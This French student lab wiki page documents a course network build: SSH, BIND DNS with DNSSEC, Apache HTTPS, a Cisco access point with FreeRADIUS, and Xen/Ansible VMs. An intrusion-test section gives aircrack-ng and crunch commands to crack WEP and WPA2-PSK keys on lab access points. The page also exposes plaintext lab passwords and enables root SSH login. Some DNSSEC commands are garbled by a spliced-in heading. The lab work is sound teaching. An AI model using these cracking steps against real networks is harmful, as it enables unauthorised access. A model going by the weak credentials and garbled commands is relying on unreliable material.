 &amp;gt; systemctl status ssh&lt;br /&gt;
 ssh.service - OpenBSD Secure Shell server&lt;br /&gt;
     Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: e&amp;gt;&lt;br /&gt;
     Active: active (running) since Mon 2021-11-29 14:47:49 UTC; 2s ago&lt;br /&gt;
       Docs: man:sshd(8)&lt;br /&gt;
             man:sshd_config(5)&lt;br /&gt;
    Process: 3679 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)&lt;br /&gt;
   Main PID: 3680 (sshd)&lt;br /&gt;
      Tasks: 1 (limit: 230)&lt;br /&gt;
     Memory: 1.3M&lt;br /&gt;
        CPU: 21ms&lt;br /&gt;
     CGroup: /system.slice/ssh.service&lt;br /&gt;
             `-3680 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups&lt;br /&gt;
&lt;br /&gt;
Puis nous testons le SSH depuis le terminal de la Zabeth :&lt;br /&gt;
 &amp;gt; ssh root@193.48.57.177 -p 2223&lt;br /&gt;
 password : glopglopglop&lt;br /&gt;
&lt;br /&gt;
Nous arrivons à nous connecter, la configuration du SSh est donc un succès.&lt;br /&gt;
&lt;br /&gt;
==Configuration du DNS==&lt;br /&gt;
&lt;br /&gt;
On a installé le package bind9 :&lt;br /&gt;
 &amp;gt;apt install bind9&lt;br /&gt;
&lt;br /&gt;
Sur le site gandit.net, nous avons modifié : &lt;br /&gt;
&lt;br /&gt;
Fenêtre Glue Records : ns1.paixdieu.site | 193.48.57.177&lt;br /&gt;
&lt;br /&gt;
Fenêtre Serveurs de noms :&lt;br /&gt;
&lt;br /&gt;
DNS Primaire : ns1.paixdieu.site | DNS Secondaire : ns6.gandi.net&lt;br /&gt;
Note : Après avoir constaté que le serveur secondaire ne se mettait pas à jour après chaque &amp;quot;notify&amp;quot; du serveur primaire, nous avons finalement choisi d'utiliser le serveur ns1.belle-rose.site en tant que serveur secondaire. &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/resolv.conf, ajout de la ligne :&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
Afin de configurer le DNS par defaut.&lt;br /&gt;
&lt;br /&gt;
Puis nous passons à la configuration du DNS primaire :&lt;br /&gt;
On ajoute donc une zone lié à notre domaine paixdieu.site de type master et le chemin de son fichier de configuration et on permet les transferts d'informations avec le DNS secondaire ns6.gandi.net.&lt;br /&gt;
&lt;br /&gt;
On ajoute donc les lignes suivantes dans /etc/bind/named.conf.local:&lt;br /&gt;
 &amp;gt;vim /etc/bind/named.conf.local&lt;br /&gt;
 &lt;br /&gt;
 zone &amp;quot;paixdieu.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.paixdieu.site&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Nous avons séparés configuration des serveurs autorisés à dupliqué nos zones de la config de nos zones en insérant les acl suivantes dans le fichier /etc/bind/named.conf. &lt;br /&gt;
&lt;br /&gt;
 options {&lt;br /&gt;
	 directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
	 dnssec-validation auto;&lt;br /&gt;
 	 dnssec-enable yes;&lt;br /&gt;
	 dnssec-lookaside auto;&lt;br /&gt;
	 listen-on-v6 { any; };&lt;br /&gt;
	 allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40; //@ de ns6.gandi.net mais plus utilisé au final&lt;br /&gt;
   193.48.57.181; //@ de ns1.belle-rose.site&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Puis nous configurons la zone paixdieu.site, pour cela on ajoute les ns.&lt;br /&gt;
On ajoute les lignes suivantes dans /etc/bind/db.paixdieu.site:&lt;br /&gt;
 &amp;gt;vim /etc/bind/db.paixdieu.site&lt;br /&gt;
 @       IN      SOA     ns1.paixdieu.site. postmaster.paixdieu.site. (&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.paixdieu.site.&lt;br /&gt;
 @       IN      NS      ns1.belle-rose.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.177&lt;br /&gt;
 www     IN      A       193.48.57.177&lt;br /&gt;
&lt;br /&gt;
Pour tester le bon fonctionnement du serveur DNS, nous utilisons la commande :&lt;br /&gt;
&lt;br /&gt;
 &amp;gt;host -t any paixdieu.site localhost&lt;br /&gt;
&lt;br /&gt;
Résultat, cela fonctionne bien :&lt;br /&gt;
&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: localhost&lt;br /&gt;
 Address: 127.0.0.1#53&lt;br /&gt;
 Aliases: &lt;br /&gt;
 paixdieu.site has SOA record ns1.paixdieu.site. postmaster.paixdieu.site. 4 604800 86400 2419200 604800&lt;br /&gt;
 paixdieu.site name server ns1.belle-rose.site.&lt;br /&gt;
 paixdieu.site name server ns1.paixdieu.site.&lt;br /&gt;
&lt;br /&gt;
==HTTPS / Certificat SSL==&lt;br /&gt;
Nous avons ensuite procéder à la création des certificats SSL.&lt;br /&gt;
Nous sommes donc aller sur Gandi, acheter un certificat.&lt;br /&gt;
Pour cela nous avons généré un CSR avec la commande :&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout paixdieu.site.key -out paixdieu.site.csr&lt;br /&gt;
&lt;br /&gt;
-newkey tsa:2048 permet de générer une requête CSR et une clé privée utilisant le chiffrement RSA sur 2048 bits.&lt;br /&gt;
&lt;br /&gt;
-keyout paixdieu.site.key permet de sauvegarder le fichier de clé privée sous le nom &amp;quot;paixdieu.site.key&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
-out paixdieu.csr permet de sauvegarder le fichier CSR sous le nom &amp;quot;paixdieu.csr&amp;quot;. &lt;br /&gt;
&lt;br /&gt;
Lors du paramètrage, nous avons bien fait attention à rentrer &amp;quot;paixdieu.site&amp;quot; comme common name pour que le certificat soit validé par gandi.&lt;br /&gt;
Cela se fait en copant le contenu de paixdieu.site.csr dans la fenêtre correspondante lors de l'achat du certificat.&lt;br /&gt;
&lt;br /&gt;
Afin de bien sauvegarder les fichiers utilisés, nous les avvons sauvegarder dans le dossier suivant:&lt;br /&gt;
 ~/save_dns/paixdieu.site.csr&lt;br /&gt;
 ~/save_dns/paixdieu.site.key&lt;br /&gt;
&lt;br /&gt;
'''4.4 Sécurisation de serveur DNS par DNSSEC'''&lt;br /&gt;
&lt;br /&gt;
Activer DNSSEC&lt;br /&gt;
&lt;br /&gt;
Dans /etc/bind/named.conf.options on ajoute les lignes :&lt;br /&gt;
 dnssec-validation yes;&lt;br /&gt;
 dnssec-enable yes;&lt;br /&gt;
 dnssec-lookaside auto;&lt;br /&gt;
&lt;br /&gt;
On crée un répertoire /etc/bind/paixdieu.site.dnssed/&lt;br /&gt;
On crée la clef asymétrique de signature de clefs de zone &lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZO'''4.4 Sécurisation de serveur DNS par DNSSEC'''NE paixdieu.site&lt;br /&gt;
On crée la clef asymétrique de la zone pour signer les enregistrements&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE paixdieu.site&lt;br /&gt;
&lt;br /&gt;
On renomme les clés :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ensuite, on crée la clé asymétrique de la zone pour signer les enregistrements :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE paixdieu.site&lt;br /&gt;
&lt;br /&gt;
On renomme les clés :&lt;br /&gt;
 mv Kpaixdieu.site.+005+17429.key paixdieu.site-ksk.key&lt;br /&gt;
 mv Kpaixdieu.site.+005+17429.private paixdieu.site-ksk.private&lt;br /&gt;
 mv Kpaixdieu.site.+005+28633.key paixdieu.site-zsk.key&lt;br /&gt;
 mv Kpaixdieu.site.+005+28633.private paixdieu.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
On les inclue à la suite de /etc/bind/db.paixdieu.site&lt;br /&gt;
 $include /etc/bind/paixdieu.site.dnssec/paixdieu.site-ksk.key&lt;br /&gt;
 $include /etc/bind/paixdieu.site.dnssec/paixdieu.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
Puis incrémente le numéro de série (5=&amp;gt;6)&lt;br /&gt;
&lt;br /&gt;
On signe des enregistrements de la zone&lt;br /&gt;
 dnssec-signzone -o paixdieu.site -k paixdie'''4.4 Sécurisation de serveur DNS par DNSSEC'''u.site-ksk ../db.paixdieu.site paixdieu.site-zsk&lt;br /&gt;
&lt;br /&gt;
Prise en compte du fichier signé&lt;br /&gt;
  &lt;br /&gt;
On modifie le fichier /etc/bind/named.conf.local de la manière suivante :&lt;br /&gt;
 zone &amp;quot;paixdieu.site&amp;quot; {&lt;br /&gt;
	type master;&lt;br /&gt;
	file &amp;quot;/etc/bind/db.paixdieu.site.signed&amp;quot;;&lt;br /&gt;
	allow-transfer {217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Pour finir, nous allons sur gandi.net, sur notre nom de domaine dans DNSSEC et nous ajoutons les deux clefs (zsk et ksk avec l'algorithme 5 (RSA/SHA-1).&lt;br /&gt;
Et nous vérifions la bon fonctionnement du DNSSEC de la manière suivante :&lt;br /&gt;
 &amp;gt; dnssec-verify -o paixdieu.site db.paixdieu.site.signed&lt;br /&gt;
&lt;br /&gt;
 Loading zone 'paixdieu.site' from file 'db.paixdieu.site.signed'&lt;br /&gt;
&lt;br /&gt;
 Verifying the zone using the following algorithms:&lt;br /&gt;
 - RSASHA1&lt;br /&gt;
 Zone fully signed:&lt;br /&gt;
 Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                     ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
&lt;br /&gt;
'''4.3 Sécurisation de site web par certificat'''&lt;br /&gt;
&lt;br /&gt;
On active le module SSL&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
On configure le port 443 pour l'HTTPS en remplaçant dans le fichier ''/etc/apache2/ports.conf'' :&lt;br /&gt;
 Listen 80&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
par&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;IfModule mod_ssl.c&amp;gt;&lt;br /&gt;
         Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On place paixdieu.site.key /etc/ssl/private/ et paixdieu.site.crt /etc/ssl/certs/&lt;br /&gt;
&lt;br /&gt;
On crée les liens symboliques pour les certificats&lt;br /&gt;
&lt;br /&gt;
 &amp;gt; c_rehash /etc/ssl/certs&lt;br /&gt;
 Doing /etc/ssl/certs&lt;br /&gt;
 WARNING: Skipping duplicate certificate ca-certificates.crt&lt;br /&gt;
 WARNING: Skipping duplicate certificate ca-certificates.crt&lt;br /&gt;
&lt;br /&gt;
On cofigure apache en ajoutant la ligne suivante dans le fichier /etc/apache2/apache2.conf :&lt;br /&gt;
 ServerName paixdieu.site&lt;br /&gt;
&lt;br /&gt;
On crée le fichier de configuration custom /etc/apache2/sites-available/000-paixdieu.site-ssl.conf :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName paixdieu.site&lt;br /&gt;
        ServerAlias www.paixdieu.site&lt;br /&gt;
	ServerAdmin webmaster@localhost&lt;br /&gt;
        DocumentRoot /var/www/html &lt;br /&gt;
	Redirect permanent / https://paixdieu.site/&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
 &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
	ServerAdmin webmaster@localhost&lt;br /&gt;
	ServerName paixdieu.site&lt;br /&gt;
	ServerAlias www.paixdieu.site&lt;br /&gt;
	DocumentRoot /var/www/html&lt;br /&gt;
	SSLEngine on&lt;br /&gt;
	SSLCertificateFile /etc/ssl/certs/paixdieu.site.crt&lt;br /&gt;
	SSLCertificateKeyFile /etc/ssl/private/paixdieu.site.key&lt;br /&gt;
	ErrorLog ${APACHE_LOG_DIR}/error.log&lt;br /&gt;
	CustomLog ${APACHE_LOG_DIR}/access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous activons le site ssl : &lt;br /&gt;
 a2ensite 000-paixdieu.site-ssl&lt;br /&gt;
&lt;br /&gt;
Nous arrivons bien à nous connecter à https://www.paixdieu.site&lt;br /&gt;
Et un test avec openssl nous renvoie le résultat suivant :&lt;br /&gt;
&lt;br /&gt;
 CONNECTED(00000003)&lt;br /&gt;
 Can't use SSL_get_servername&lt;br /&gt;
 depth=0 CN = paixdieu.site&lt;br /&gt;
 verify error:num=20:unable to get local issuer certificate&lt;br /&gt;
 verify return:1&lt;br /&gt;
 depth=0 CN = paixdieu.site&lt;br /&gt;
 verify error:num=21:unable to verify the first certificate&lt;br /&gt;
 verify return:1&lt;br /&gt;
 depth=0 CN = paixdieu.site&lt;br /&gt;
 verify return:1&lt;br /&gt;
 ---&lt;br /&gt;
 Certificate chain&lt;br /&gt;
 0 s:CN = paixdieu.site&lt;br /&gt;
   i:C = FR, ST = Paris, L = Paris, O = Gandi, CN = Gandi Standard SSL CA 2&lt;br /&gt;
 ---&lt;br /&gt;
 Server certificate&lt;br /&gt;
 -----BEGIN CERTIFICATE-----&lt;br /&gt;
 [...]&lt;br /&gt;
 -----END CERTIFICATE-----&lt;br /&gt;
 subject=CN = paixdieu.site&lt;br /&gt;
 issuer=C = FR, ST = Paris, L = Paris, O = Gandi, CN = Gandi Standard SSL CA 2&lt;br /&gt;
 ---&lt;br /&gt;
&lt;br /&gt;
= Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''5.2 Cassage de clef WEP d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Récupération du nom de l'interface réseau WiFi du eeePC:&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
On trouve : '''wlx40a5ef0f68cb'''&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor sur le channel 4:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
Après cette étape, il est possible que la carte réseau soit renommée par airmon-ng en wlan0mon.&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ecouter les beacon WiFi sur cette carte réseau :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
De cette écoute , nous choisissons l'AP nommé '''cracotte09'''  avec le BSSID  : '''04:DA:D2:9C:50:58'''&lt;br /&gt;
&lt;br /&gt;
Nous simulons l'authentification sur cet AP :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte09 -a 04:DA:D2:9C:50:58' wlan0mon&lt;br /&gt;
&lt;br /&gt;
 -9 : mode injection&lt;br /&gt;
 -e cracotte09 : nom du point d'accès&lt;br /&gt;
 -a 04:DA:D2:9C:50:58 : bssid du point d'accès&lt;br /&gt;
&lt;br /&gt;
Nous récupérons ensuite un nombre de frames conséquent émis par cet access point :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte09 -a 04:DA:D2:9C:50:58 -h 40:A5:EF:01:28:D0 wlan0mon&lt;br /&gt;
&lt;br /&gt;
-1 : mode &amp;quot;fake authentification&amp;quot;&lt;br /&gt;
0 : délai entre les demandes d'authentifications&lt;br /&gt;
-h 40:A5:EF:01:27:D0 : bssid de l'interface réseau&lt;br /&gt;
&lt;br /&gt;
Résultat :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Key_name.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
'''5.3 Cassage de clef WPA2-PSK d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Maintenant nous choisissions kracotte5 comme victime à l'aide du groupe de commande précédentes, c'est à dire :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons trouvé la victime (kracotte 5 ainsi que son BSSID), nous tentons de récupérer un handshake provenant de ce point d'accès et nous le stockons dans un fichier psk :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:04 -w psk wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous installons ensuite un utilitaire pour générer le dictionnaire de clé WPA2-PSK qui sera utilisé par aircrack-ng pour se connecter au point d'accès wifi kracotte5 :&lt;br /&gt;
&lt;br /&gt;
 apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
Pour installer cette utilitaire nous pouvons relier l'eeePc au réseau de l'école à l'aide du deuxième câble ethernet disponnible à l'arrière des zabeth :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:branchement_eee_pc.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une fois installé nous pouvons générer le dictionnaire :&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Une fois généré, nous pouvons lancer la précédure de crackage (qui peut être très longue) :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:04 psk*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Crackage_wpa.png|center|thumb|500px|Crackage WPA]]&lt;br /&gt;
&lt;br /&gt;
'''5.5  Intrusion sur un serveur d’application Web'''&lt;br /&gt;
[[Fichier:Wiki intrusion 5.5.zip]]&lt;br /&gt;
&lt;br /&gt;
= Configuration point d'accès WiFI =&lt;br /&gt;
&lt;br /&gt;
Configuration du point d'accès WiFi E304 (primaire) :&lt;br /&gt;
&lt;br /&gt;
Installation de minicom sur macos : &lt;br /&gt;
 brew install minicom&lt;br /&gt;
&lt;br /&gt;
Récupération du nom du point d'accès connecté en USB (mac Os):&lt;br /&gt;
 ls /dev/cu*&lt;br /&gt;
&lt;br /&gt;
On obtient (en branchant et débranchant on identifie l'appareil qui apparait): &lt;br /&gt;
 /dev/cu.usbserial-FTB3OOLY&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur WiFi :&lt;br /&gt;
 minicom -os&lt;br /&gt;
&lt;br /&gt;
Configuration à ajouter :&lt;br /&gt;
 Nom de device : /dev/cu.usbserial-FTB3OOLY&lt;br /&gt;
 Baudrate : 9600 8N1&lt;br /&gt;
&lt;br /&gt;
Sources : &lt;br /&gt;
- https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5_2021/2022_G6&lt;br /&gt;
- https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau006.html#sec29&lt;br /&gt;
&lt;br /&gt;
 enable =&amp;gt; Passer en root (mdp : Cisco si par défaut)&lt;br /&gt;
 conf t &lt;br /&gt;
 hostname wifi-ima5sc-e304 =&amp;gt; (optionnel) on donne un nom à notre point d'accès&lt;br /&gt;
 ip domain-name plil.info =&amp;gt; ajoute un nom de domaine (utilisé pour la création de certificats)&lt;br /&gt;
 &lt;br /&gt;
Activation du ssh :&lt;br /&gt;
 &lt;br /&gt;
 crypto key generate rsa general-keys modulus 2048 =&amp;gt; Génération clés publique/privée &lt;br /&gt;
 ip ssh version 2 =&amp;gt; Activation ssh&lt;br /&gt;
&lt;br /&gt;
Configuration de l'authentification sur le point d'accès :&lt;br /&gt;
&lt;br /&gt;
 aaa new-model&lt;br /&gt;
 aaa authentication login eap_marguerite group radius_marguerite&lt;br /&gt;
 radius-server host 193.48.57.177 auth-port 1812 acct-port 1813 key secret_marguerite&lt;br /&gt;
 aaa group server radius radius_marguerite&lt;br /&gt;
 server 193.48.57.177 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID :&lt;br /&gt;
 &lt;br /&gt;
 conf t&lt;br /&gt;
 dot11 ssid SSID_MARGUERITE&lt;br /&gt;
 vlan 11&lt;br /&gt;
  authentication open eap eap_marguerite&lt;br /&gt;
  authentication network-eap eap_marguerite&lt;br /&gt;
  authentication key-management wpa&lt;br /&gt;
  mbssid guest-mode&lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Association du SSID à l'interface Wi-Fi :&lt;br /&gt;
 &lt;br /&gt;
 conf t&lt;br /&gt;
 interface Dot11Radio0&lt;br /&gt;
  encryption vlan 11 mode ciphers aes-ccm tkip&lt;br /&gt;
  ssid SSID_MARGUERITE&lt;br /&gt;
  mbssid&lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Configuration du Vlan 11 :&lt;br /&gt;
 &lt;br /&gt;
 conf t&lt;br /&gt;
 interface Dot11Radio0.11&lt;br /&gt;
  encapsulation dot1Q 11&lt;br /&gt;
  no ip route-cache&lt;br /&gt;
  bridge-group 11&lt;br /&gt;
  bridge-group 11 subscriber-loop-control&lt;br /&gt;
  bridge-group 11 spanning-disabled&lt;br /&gt;
  bridge-group 11 block-unknown-source&lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Configuration interface filaire :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet0.11&lt;br /&gt;
  encapsulation dot1Q 11&lt;br /&gt;
  bridge-group 11&lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'IP du point d'accès et sa Gateway (n'est pas à faire par tous les groupes) :&lt;br /&gt;
 &lt;br /&gt;
 conf t&lt;br /&gt;
  ip default-gateway 10.1.0.2&lt;br /&gt;
  interface BVI 1&lt;br /&gt;
   ip address 10.1.0.4 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
'''Configuration du routeur en e304 :''' &lt;br /&gt;
&lt;br /&gt;
Configuration du VLAN1 :&lt;br /&gt;
  conf t&lt;br /&gt;
  interface vlan 1&lt;br /&gt;
   ip address 10.1.0.2 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Configuration du port sur lequel est branché l'AP en mode trunk : &lt;br /&gt;
&lt;br /&gt;
  conf t&lt;br /&gt;
  interface Gi4/2&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
   switchport trunk allowed vlan add 1&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
= Serveur FreeRadius =&lt;br /&gt;
&lt;br /&gt;
Installation de freeRADIUS&lt;br /&gt;
&lt;br /&gt;
 apt install freeradius&lt;br /&gt;
&lt;br /&gt;
On commence par configurer &amp;lt;code&amp;gt;/etc/freeradius/3.0/clients.conf&amp;lt;/code&amp;gt; à détailler&lt;br /&gt;
&lt;br /&gt;
 client marguerite {&lt;br /&gt;
 	ipaddr = 10.1.0.4/24&lt;br /&gt;
 	secret = secret_marguerite&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
ensuite &amp;lt;code&amp;gt;/etc/freeradius/3.0/mods-enabled/eap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 eap {&lt;br /&gt;
   [...]&lt;br /&gt;
   default_eap_type = peap&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
puis &amp;lt;code&amp;gt;/etc/freeradius/3.0/users&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 root Cleartext-Password := &amp;quot;glopglop&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne bien, on peut lancer freeradius en mode debug &amp;lt;code&amp;gt;freeradius -X&amp;lt;/code&amp;gt; (après avoir au préalable stoppé le processus)&lt;br /&gt;
&lt;br /&gt;
= Ferme de serveurs Web =&lt;br /&gt;
&lt;br /&gt;
Installation VM xen :&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/pra-07.cfg&lt;br /&gt;
&lt;br /&gt;
Configuration IP :&lt;br /&gt;
&lt;br /&gt;
Dans /etc/network/interfaces :&lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 172.26.145.102&lt;br /&gt;
 netmask 255.255.255.0&lt;br /&gt;
 gateway 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Vérifier si on a bien la passerelle par défaut de configurer &lt;br /&gt;
&lt;br /&gt;
 ip r&lt;br /&gt;
&lt;br /&gt;
On peut pinger le routeur :&lt;br /&gt;
&lt;br /&gt;
 ping 172.26.154.254&lt;br /&gt;
&lt;br /&gt;
Mais pas les addresses ipv4 routée :&lt;br /&gt;
&lt;br /&gt;
 ping 8.8.8.8 échoue &lt;br /&gt;
&lt;br /&gt;
Redémarage service networking&lt;br /&gt;
&lt;br /&gt;
 service networking restart&lt;br /&gt;
&lt;br /&gt;
Si ça n'est pas suffisant :&lt;br /&gt;
&lt;br /&gt;
 ifdown eth0&lt;br /&gt;
 ifup eth0&lt;br /&gt;
 &lt;br /&gt;
Dans /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Redémarage service ssh&lt;br /&gt;
export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 service sshd restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'une clé ssh sur la zabeth et ajout de cette clé dans les clés autorisées de la vm de pra :&lt;br /&gt;
&lt;br /&gt;
 ssh-keygen -t ed25519 -f ~/.ssh/id_ed25519 -C &amp;quot;aviran.tetia@polytech-lille.net&amp;quot; -P &amp;quot;&amp;quot;&lt;br /&gt;
&lt;br /&gt;
On copie le contenu de la clé crée :&lt;br /&gt;
&lt;br /&gt;
 cat ~/.ssh/id_ed25519.pub&lt;br /&gt;
&lt;br /&gt;
On colle son contenu dans les clé authorisées de la VM (fichier ~/.ssh/authorized_keys) :&lt;br /&gt;
&lt;br /&gt;
 cat ~/.ssh/authorized_keys &lt;br /&gt;
 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDZfT1XxI7Zmqd07dup81hztaYKwLLapjhORHWmxUUCJ aviran.tetia@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Correction de la source list de la VM pour pouvoir utiliser apt correctement :&lt;br /&gt;
&lt;br /&gt;
On remplace les deux dernières lignes par :&lt;br /&gt;
&lt;br /&gt;
 deb     http://security.debian.org/debian-security bullseye-security main contrib non-free&lt;br /&gt;
 deb-src http://security.debian.org/debian-security bullseye-security  main contrib non-free&lt;br /&gt;
 &lt;br /&gt;
Installation de python sur la VM :&lt;br /&gt;
&lt;br /&gt;
 apt update &lt;br /&gt;
 apt install python3&lt;br /&gt;
&lt;br /&gt;
Création d'un venv pour l'éxecution :&lt;br /&gt;
&lt;br /&gt;
 python3 -m venv ~/env-ansible&lt;br /&gt;
 . ~/env-ansible/bin/activate&lt;br /&gt;
 pip3 install -U setuptools wheel&lt;br /&gt;
 pip3 install -U ansible&lt;br /&gt;
&lt;br /&gt;
On crée l'arborescence suivante :&lt;br /&gt;
 &lt;br /&gt;
 └── roles&lt;br /&gt;
    ├── base&lt;br /&gt;
    │   ├── tasks&lt;br /&gt;
    │   │   └── main.yml&lt;br /&gt;
    │   └── templates&lt;br /&gt;
    │       ├── hostname.j2&lt;br /&gt;
    │       └── hosts.j2&lt;br /&gt;
    └── ssh_key&lt;br /&gt;
        ├── tasks&lt;br /&gt;
        │   └── main.yml&lt;br /&gt;
        └── templates&lt;br /&gt;
            └── keys.j2&lt;br /&gt;
&lt;br /&gt;
Dans main.yml :&lt;br /&gt;
 - name: &amp;quot;Setup sshkeys&amp;quot;&lt;br /&gt;
  template:&lt;br /&gt;
    src: keys.j2&lt;br /&gt;
    dest: /root/.ssh/authorized_keys&lt;br /&gt;
    owner: root&lt;br /&gt;
    group: root&lt;br /&gt;
    mode: &amp;quot;0600&amp;quot;&lt;br /&gt;
&lt;br /&gt;
/!\ ne pas mettre de tabulation dans ce fichier, uniquement des espaces&lt;br /&gt;
&lt;br /&gt;
